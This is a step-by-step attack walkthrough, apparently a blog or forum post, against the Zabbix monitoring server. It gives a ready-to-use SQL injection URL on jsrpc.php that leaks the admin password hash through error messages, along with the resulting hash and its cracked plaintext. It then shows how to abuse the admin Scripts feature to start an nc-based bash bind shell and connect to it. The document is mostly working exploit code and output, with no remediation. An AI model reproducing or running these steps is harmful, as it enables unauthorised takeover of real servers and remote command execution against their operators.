Latest Zabbix SQL Injection and getShell

Injection URL:

/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

Retrieving the password:

<code>

<div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (235, 1, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (236, 1, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (237, 1, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li></ul></td></tr></table>

</code>

3. Crack the password

2b57c344a28a3c38 -> aol321

4. Log in to the admin console

5. getShell

Admin console -> Administration -> Scripts -> Create Script -> in the Command field, enter:

<code>

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo

</code>

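For Execute on, select Zabbix server -> Save

On the Dashboard, click a Host -> in the window that appears, click the name of the script just created -> the link is followed.

6. Connect to port 2222 with nc

nc *.*.*.* 2222

7. Shell Got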
